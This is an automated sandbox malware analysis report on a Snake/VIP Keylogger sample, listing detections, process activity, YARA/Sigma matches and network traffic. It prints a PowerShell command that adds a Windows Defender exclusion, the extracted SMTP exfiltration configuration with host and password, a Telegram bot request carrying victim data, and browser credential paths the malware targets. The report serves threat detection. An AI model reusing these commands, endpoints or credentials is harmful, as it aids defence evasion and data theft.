Edit tour

Windows Analysis Report
M2AB8BeHc4.exe

Overview

General Information

Sample name:	M2AB8BeHc4.exe renamed because original name is a hash value
Original sample name:	cd437678986f11ba11e754bb1153f9a0.exe
Analysis ID:	1544355
MD5:	cd437678986f11ba11e754bb1153f9a0
SHA1:	24fe760f960ce0653d014fa5348decfae1918f13
SHA256:	548c158482e4cc2f2b6c931c92f66dc70a0e35c8a8031709249f8634e10e0108
Tags:	32exetrojan
Infos:

Detection

Snake Keylogger, VIP Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Yara detected AntiVM3

Yara detected Snake Keylogger

Yara detected Telegram RAT

Yara detected VIP Keylogger

.NET source code contains potential unpacker

.NET source code references suspicious native API functions

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Contains functionality to capture screen (.Net source)

Contains functionality to log keystrokes (.Net Source)

Loading BitLocker PowerShell Module

Machine Learning detection for sample

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses the Telegram API (likely for C&C communication)

Yara detected Generic Downloader

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality to call native functions

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

M2AB8BeHc4.exe (PID: 6520 cmdline: "C:\Users\user\Desktop\M2AB8BeHc4.exe" MD5: CD437678986F11BA11E754BB1153F9A0)

powershell.exe (PID: 3604 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\M2AB8BeHc4.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 3736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 7244 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

M2AB8BeHc4.exe (PID: 2720 cmdline: "C:\Users\user\Desktop\M2AB8BeHc4.exe" MD5: CD437678986F11BA11E754BB1153F9A0)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "SMTP", "Email ID": "mpomlog@fibraunollc.top", "Password": "7213575aceACE@@  ", "Host": "185.198.59.26", "Port": "587", "Version": "4.4"}

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "mpomlog@fibraunollc.top", "Password": "7213575aceACE@@  ", "Host": "185.198.59.26", "Port": "587", "Version": "4.4"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000003.00000002.4170386532.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000002.4170386532.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000003.00000002.4170386532.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000003.00000002.4170386532.0000000000402000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2daa0:$a1: get_encryptedPassword 0x2e028:$a2: get_encryptedUsername 0x2d713:$a3: get_timePasswordChanged 0x2d82a:$a4: get_passwordField 0x2dab6:$a5: set_encryptedPassword 0x307d2:$a6: get_passwords 0x30b66:$a7: get_logins 0x307be:$a8: GetOutlookPasswords 0x30177:$a9: StartKeylogger 0x30abf:$a10: KeyLoggerEventArgs 0x30217:$a11: KeyLoggerEventArgsEventHandler
00000003.00000002.4176439192.0000000002D17000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000002.4176439192.0000000002D17000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000003.00000002.4176439192.0000000002C21000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000000.00000002.1736837447.0000000004147000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1736837447.0000000004147000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000000.00000002.1736837447.0000000004147000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000000.00000002.1736837447.0000000004147000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x35f5e8:$a1: get_encryptedPassword 0x3a2608:$a1: get_encryptedPassword 0x3e5428:$a1: get_encryptedPassword 0x35fb70:$a2: get_encryptedUsername 0x3a2b90:$a2: get_encryptedUsername 0x3e59b0:$a2: get_encryptedUsername 0x35f25b:$a3: get_timePasswordChanged 0x3a227b:$a3: get_timePasswordChanged 0x3e509b:$a3: get_timePasswordChanged 0x35f372:$a4: get_passwordField 0x3a2392:$a4: get_passwordField 0x3e51b2:$a4: get_passwordField 0x35f5fe:$a5: set_encryptedPassword 0x3a261e:$a5: set_encryptedPassword 0x3e543e:$a5: set_encryptedPassword 0x36231a:$a6: get_passwords 0x3a533a:$a6: get_passwords 0x3e815a:$a6: get_passwords 0x3626ae:$a7: get_logins 0x3a56ce:$a7: get_logins 0x3e84ee:$a7: get_logins
Process Memory Space: M2AB8BeHc4.exe PID: 6520	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: M2AB8BeHc4.exe PID: 6520	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: M2AB8BeHc4.exe PID: 6520	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: M2AB8BeHc4.exe PID: 6520	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: M2AB8BeHc4.exe PID: 6520	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xe5a3f:$a1: get_encryptedPassword 0xe5ee4:$a2: get_encryptedUsername 0xe56d4:$a3: get_timePasswordChanged 0xe57df:$a4: get_passwordField 0xe5a55:$a5: set_encryptedPassword 0xe829a:$a6: get_passwords 0xe8571:$a7: get_logins 0xe8286:$a8: GetOutlookPasswords 0xe7cc8:$a9: StartKeylogger 0xe84df:$a10: KeyLoggerEventArgs 0xe7d68:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: M2AB8BeHc4.exe PID: 2720	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: M2AB8BeHc4.exe PID: 2720	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: M2AB8BeHc4.exe PID: 2720	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: M2AB8BeHc4.exe PID: 2720	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x101f17:$a1: get_encryptedPassword 0x102495:$a2: get_encryptedUsername 0x101b99:$a3: get_timePasswordChanged 0x101cb0:$a4: get_passwordField 0x101f2d:$a5: set_encryptedPassword 0x104bf1:$a6: get_passwords 0x104f81:$a7: get_logins 0x104bdd:$a8: GetOutlookPasswords 0x104596:$a9: StartKeylogger 0x104eda:$a10: KeyLoggerEventArgs 0x104636:$a11: KeyLoggerEventArgsEventHandler
Click to see the 15 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
3.2.M2AB8BeHc4.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.2.M2AB8BeHc4.exe.400000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
3.2.M2AB8BeHc4.exe.400000.0.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
3.2.M2AB8BeHc4.exe.400000.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
3.2.M2AB8BeHc4.exe.400000.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2dca0:$a1: get_encryptedPassword 0x2e228:$a2: get_encryptedUsername 0x2d913:$a3: get_timePasswordChanged 0x2da2a:$a4: get_passwordField 0x2dcb6:$a5: set_encryptedPassword 0x309d2:$a6: get_passwords 0x30d66:$a7: get_logins 0x309be:$a8: GetOutlookPasswords 0x30377:$a9: StartKeylogger 0x30cbf:$a10: KeyLoggerEventArgs 0x30417:$a11: KeyLoggerEventArgsEventHandler
3.2.M2AB8BeHc4.exe.400000.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3b29e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3a941:$a3: \Google\Chrome\User Data\Default\Login Data 0x3ab9e:$a4: \Orbitum\User Data\Default\Login Data 0x3b57d:$a5: \Kometa\User Data\Default\Login Data
3.2.M2AB8BeHc4.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2f064:$s1: UnHook 0x2f06b:$s2: SetHook 0x2f073:$s3: CallNextHook 0x2f080:$s4: _hook
0.2.M2AB8BeHc4.exe.4478948.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.M2AB8BeHc4.exe.4478948.2.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.M2AB8BeHc4.exe.4478948.2.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.M2AB8BeHc4.exe.4478948.2.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2bea0:$a1: get_encryptedPassword 0x2c428:$a2: get_encryptedUsername 0x2bb13:$a3: get_timePasswordChanged 0x2bc2a:$a4: get_passwordField 0x2beb6:$a5: set_encryptedPassword 0x2ebd2:$a6: get_passwords 0x2ef66:$a7: get_logins 0x2ebbe:$a8: GetOutlookPasswords 0x2e577:$a9: StartKeylogger 0x2eebf:$a10: KeyLoggerEventArgs 0x2e617:$a11: KeyLoggerEventArgsEventHandler
0.2.M2AB8BeHc4.exe.4478948.2.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3949e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x38b41:$a3: \Google\Chrome\User Data\Default\Login Data 0x38d9e:$a4: \Orbitum\User Data\Default\Login Data 0x3977d:$a5: \Kometa\User Data\Default\Login Data
0.2.M2AB8BeHc4.exe.4478948.2.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2d264:$s1: UnHook 0x2d26b:$s2: SetHook 0x2d273:$s3: CallNextHook 0x2d280:$s4: _hook
0.2.M2AB8BeHc4.exe.43f4128.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.M2AB8BeHc4.exe.43f4128.0.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.M2AB8BeHc4.exe.43f4128.0.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.M2AB8BeHc4.exe.43f4128.0.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.M2AB8BeHc4.exe.43f4128.0.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xb24c0:$a1: get_encryptedPassword 0xf54e0:$a1: get_encryptedPassword 0x138300:$a1: get_encryptedPassword 0xb2a48:$a2: get_encryptedUsername 0xf5a68:$a2: get_encryptedUsername 0x138888:$a2: get_encryptedUsername 0xb2133:$a3: get_timePasswordChanged 0xf5153:$a3: get_timePasswordChanged 0x137f73:$a3: get_timePasswordChanged 0xb224a:$a4: get_passwordField 0xf526a:$a4: get_passwordField 0x13808a:$a4: get_passwordField 0xb24d6:$a5: set_encryptedPassword 0xf54f6:$a5: set_encryptedPassword 0x138316:$a5: set_encryptedPassword 0xb51f2:$a6: get_passwords 0xf8212:$a6: get_passwords 0x13b032:$a6: get_passwords 0xb5586:$a7: get_logins 0xf85a6:$a7: get_logins 0x13b3c6:$a7: get_logins
0.2.M2AB8BeHc4.exe.43f4128.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0xb3884:$s1: UnHook 0xf68a4:$s1: UnHook 0x1396c4:$s1: UnHook 0xb388b:$s2: SetHook 0xf68ab:$s2: SetHook 0x1396cb:$s2: SetHook 0xb3893:$s3: CallNextHook 0xf68b3:$s3: CallNextHook 0x1396d3:$s3: CallNextHook 0xb38a0:$s4: _hook 0xf68c0:$s4: _hook 0x1396e0:$s4: _hook
0.2.M2AB8BeHc4.exe.4478948.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.M2AB8BeHc4.exe.4478948.2.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.M2AB8BeHc4.exe.4478948.2.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.M2AB8BeHc4.exe.4478948.2.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.M2AB8BeHc4.exe.4478948.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2dca0:$a1: get_encryptedPassword 0x70cc0:$a1: get_encryptedPassword 0xb3ae0:$a1: get_encryptedPassword 0x2e228:$a2: get_encryptedUsername 0x71248:$a2: get_encryptedUsername 0xb4068:$a2: get_encryptedUsername 0x2d913:$a3: get_timePasswordChanged 0x70933:$a3: get_timePasswordChanged 0xb3753:$a3: get_timePasswordChanged 0x2da2a:$a4: get_passwordField 0x70a4a:$a4: get_passwordField 0xb386a:$a4: get_passwordField 0x2dcb6:$a5: set_encryptedPassword 0x70cd6:$a5: set_encryptedPassword 0xb3af6:$a5: set_encryptedPassword 0x309d2:$a6: get_passwords 0x739f2:$a6: get_passwords 0xb6812:$a6: get_passwords 0x30d66:$a7: get_logins 0x73d86:$a7: get_logins 0xb6ba6:$a7: get_logins
0.2.M2AB8BeHc4.exe.436f908.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.M2AB8BeHc4.exe.436f908.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.M2AB8BeHc4.exe.436f908.1.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.M2AB8BeHc4.exe.436f908.1.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.M2AB8BeHc4.exe.436f908.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x136ce0:$a1: get_encryptedPassword 0x179d00:$a1: get_encryptedPassword 0x1bcb20:$a1: get_encryptedPassword 0x137268:$a2: get_encryptedUsername 0x17a288:$a2: get_encryptedUsername 0x1bd0a8:$a2: get_encryptedUsername 0x136953:$a3: get_timePasswordChanged 0x179973:$a3: get_timePasswordChanged 0x1bc793:$a3: get_timePasswordChanged 0x136a6a:$a4: get_passwordField 0x179a8a:$a4: get_passwordField 0x1bc8aa:$a4: get_passwordField 0x136cf6:$a5: set_encryptedPassword 0x179d16:$a5: set_encryptedPassword 0x1bcb36:$a5: set_encryptedPassword 0x139a12:$a6: get_passwords 0x17ca32:$a6: get_passwords 0x1bf852:$a6: get_passwords 0x139da6:$a7: get_logins 0x17cdc6:$a7: get_logins 0x1bfbe6:$a7: get_logins
0.2.M2AB8BeHc4.exe.4478948.2.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3b29e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x7e2be:$a2: \Comodo\Dragon\User Data\Default\Login Data 0xc10de:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3a941:$a3: \Google\Chrome\User Data\Default\Login Data 0x7d961:$a3: \Google\Chrome\User Data\Default\Login Data 0xc0781:$a3: \Google\Chrome\User Data\Default\Login Data 0x3ab9e:$a4: \Orbitum\User Data\Default\Login Data 0x7dbbe:$a4: \Orbitum\User Data\Default\Login Data 0xc09de:$a4: \Orbitum\User Data\Default\Login Data 0x3b57d:$a5: \Kometa\User Data\Default\Login Data 0x7e59d:$a5: \Kometa\User Data\Default\Login Data 0xc13bd:$a5: \Kometa\User Data\Default\Login Data
0.2.M2AB8BeHc4.exe.436f908.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x1380a4:$s1: UnHook 0x17b0c4:$s1: UnHook 0x1bdee4:$s1: UnHook 0x1380ab:$s2: SetHook 0x17b0cb:$s2: SetHook 0x1bdeeb:$s2: SetHook 0x1380b3:$s3: CallNextHook 0x17b0d3:$s3: CallNextHook 0x1bdef3:$s3: CallNextHook 0x1380c0:$s4: _hook 0x17b0e0:$s4: _hook 0x1bdf00:$s4: _hook
0.2.M2AB8BeHc4.exe.4478948.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2f064:$s1: UnHook 0x72084:$s1: UnHook 0xb4ea4:$s1: UnHook 0x2f06b:$s2: SetHook 0x7208b:$s2: SetHook 0xb4eab:$s2: SetHook 0x2f073:$s3: CallNextHook 0x72093:$s3: CallNextHook 0xb4eb3:$s3: CallNextHook 0x2f080:$s4: _hook 0x720a0:$s4: _hook 0xb4ec0:$s4: _hook
Click to see the 27 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\M2AB8BeHc4.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\M2AB8BeHc4.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\M2AB8BeHc4.exe", ParentImage: C:\Users\user\Desktop\M2AB8BeHc4.exe, ParentProcessId: 6520, ParentProcessName: M2AB8BeHc4.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\M2AB8BeHc4.exe", ProcessId: 3604, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\M2AB8BeHc4.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\M2AB8BeHc4.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\M2AB8BeHc4.exe", ParentImage: C:\Users\user\Desktop\M2AB8BeHc4.exe, ParentProcessId: 6520, ParentProcessName: M2AB8BeHc4.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\M2AB8BeHc4.exe", ProcessId: 3604, ProcessName: powershell.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-29T10:16:10.975023+0100	2803305	3	Unknown Traffic	192.168.2.4	49737	188.114.97.3	443	TCP
2024-10-29T10:16:12.465520+0100	2803305	3	Unknown Traffic	192.168.2.4	49742	188.114.97.3	443	TCP
2024-10-29T10:16:13.877740+0100	2803305	3	Unknown Traffic	192.168.2.4	49744	188.114.97.3	443	TCP
2024-10-29T10:16:15.450706+0100	2803305	3	Unknown Traffic	192.168.2.4	49746	188.114.97.3	443	TCP
2024-10-29T10:16:17.151406+0100	2803305	3	Unknown Traffic	192.168.2.4	49748	188.114.97.3	443	TCP
2024-10-29T10:16:21.186445+0100	2803305	3	Unknown Traffic	192.168.2.4	49753	188.114.97.3	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-29T10:16:06.456638+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49739	158.101.44.242	80	TCP
2024-10-29T10:16:08.650515+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49733	158.101.44.242	80	TCP
2024-10-29T10:16:09.994125+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49733	158.101.44.242	80	TCP
2024-10-29T10:16:13.166004+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49743	158.101.44.242	80	TCP
2024-10-29T10:16:14.712887+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49745	158.101.44.242	80	TCP
2024-10-29T10:16:16.447298+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49747	158.101.44.242	80	TCP
2024-10-29T10:16:18.384798+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49749	158.101.44.242	80	TCP
2024-10-29T10:16:20.431866+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49751	158.101.44.242	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000003.00000002.4176439192.0000000002C21000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "mpomlog@fibraunollc.top", "Password": "7213575aceACE@@ ", "Host": "185.198.59.26", "Port": "587", "Version": "4.4"}
Source: 3.2.M2AB8BeHc4.exe.400000.0.unpack	Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "mpomlog@fibraunollc.top", "Password": "7213575aceACE@@ ", "Host": "185.198.59.26", "Port": "587", "Version": "4.4"}

Multi AV Scanner detection for submitted file

Source: M2AB8BeHc4.exe

ReversingLabs: Detection: 34%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: M2AB8BeHc4.exe

Joe Sandbox ML: detected

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: M2AB8BeHc4.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49734 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49737 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49750 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49753 version: TLS 1.0

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49755 version: TLS 1.2

Source: M2AB8BeHc4.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\M2AB8BeHc4.exe

Code function: 4x nop then jmp 00FAFA11h

3_2_00FAF759

Networking

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Yara detected Generic Downloader

Source: Yara match	File source: 3.2.M2AB8BeHc4.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.M2AB8BeHc4.exe.43f4128.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.M2AB8BeHc4.exe.4478948.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.M2AB8BeHc4.exe.436f908.1.raw.unpack, type: UNPACKEDPE

Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/173.254.250.72 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:675052%0D%0ADate%20and%20Time:%2029/10/2024%20/%2018:30:13%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20675052%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 158.101.44.242 158.101.44.242

Source: Joe Sandbox View	ASN Name: TELEGRAMRU TELEGRAMRU
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49743 -> 158.101.44.242:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49751 -> 158.101.44.242:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49745 -> 158.101.44.242:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49747 -> 158.101.44.242:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49733 -> 158.101.44.242:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49749 -> 158.101.44.242:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49739 -> 158.101.44.242:80
